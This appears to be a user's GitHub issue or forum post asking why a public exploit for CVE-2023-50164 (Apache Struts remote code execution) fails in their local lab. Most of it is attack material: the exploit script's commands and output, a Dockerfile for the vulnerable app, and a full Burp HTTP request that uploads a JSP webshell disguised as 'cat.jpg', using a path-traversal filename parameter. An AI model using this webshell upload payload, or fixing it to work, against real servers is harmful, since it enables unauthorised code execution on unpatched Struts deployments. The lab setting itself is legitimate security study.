Thank you for creating this test exploit. I followed all your steps but I am not getting the shell. It keeps on failing at "Maximum attempts reached. Exiting..."
What I have tried so Far:
Ran application using:
┌──(kali㉿kali)-[~/CVE-2023-50164-Apache-Struts-RCE/struts-app]
└─$ sudo mvn jetty:run
┌──(kali㉿kali)-[~/CVE-2023-50164-Apache-Struts-RCE/exploit]
└─$ python exploit.py --url http://0.0.0.0:9999/upload/upload.action
[+] Starting exploitation...
[+] WAR file already exists.
[+] webshell.war uploaded successfully.
[+] Reach the JSP webshell at http://0.0.0.0:9999/webshell/webshell.jsp?cmd=<COMMAND>
[+] Attempting a connection with webshell.
[-] Maximum attempts reached. Exiting...
FROM tomcat:9.0.84-jre21-temurin-jammy
WORKDIR $CATALINA_HOME/webapps
ADD struts-app/target/upload-1.0.0.war ROOT.war
EXPOSE 8080
CMD ["catalina.sh", "run"]
sudo docker build -t exploitable -f DOCKERFILE .
sudo docker run -p 8080:8080 exploitable
┌──(kali㉿kali)-[~/CVE-2023-50164-Apache-Struts-RCE/exploit]
└─$ python exploit.py --url http://localhost:8080/upload.action
[+] Starting exploitation...
[+] WAR file already exists.
[+] webshell.war uploaded successfully.
[+] Reach the JSP webshell at http://localhost:8080/webshell/webshell.jsp?cmd=<COMMAND>
[+] Attempting a connection with webshell.
[-] Maximum attempts reached. Exiting...
Furthermore, I have tried to exploit it manually and its still not uploading the file.
here is the payload I used in Burp:
POST /upload.action HTTP/1.1
Host: localhost:8080
Content-Length: 655
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrGpRBHBc0EPTTB4o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/upload.action
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=443CC7117FB5529DA2FC9A32731D8929
Connection: close
------WebKitFormBoundaryrGpRBHBc0EPTTB4o
Content-Disposition: form-data; name="upload"; filename="cat.jpg"
Content-Type: image/jpeg
<%@ page import="java.util.*,java.io.*"%>
<pre>
<%
Process p = Runtime.getRuntime().exec("/bin/id");
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readline();
while (disr != null) {
out.println(disr);
disr = dis.readline();
}
%>
</pre>
------WebKitFormBoundaryrGpRBHBc0EPTTB4o
Content-Disposition: form-data; name="uploadFileName";
../shell.jsp
------WebKitFormBoundaryrGpRBHBc0EPTTB4o--
I would be very thankful if you can let me know what mistake I am making here or any thing I am missing before running this exploit. Thank you.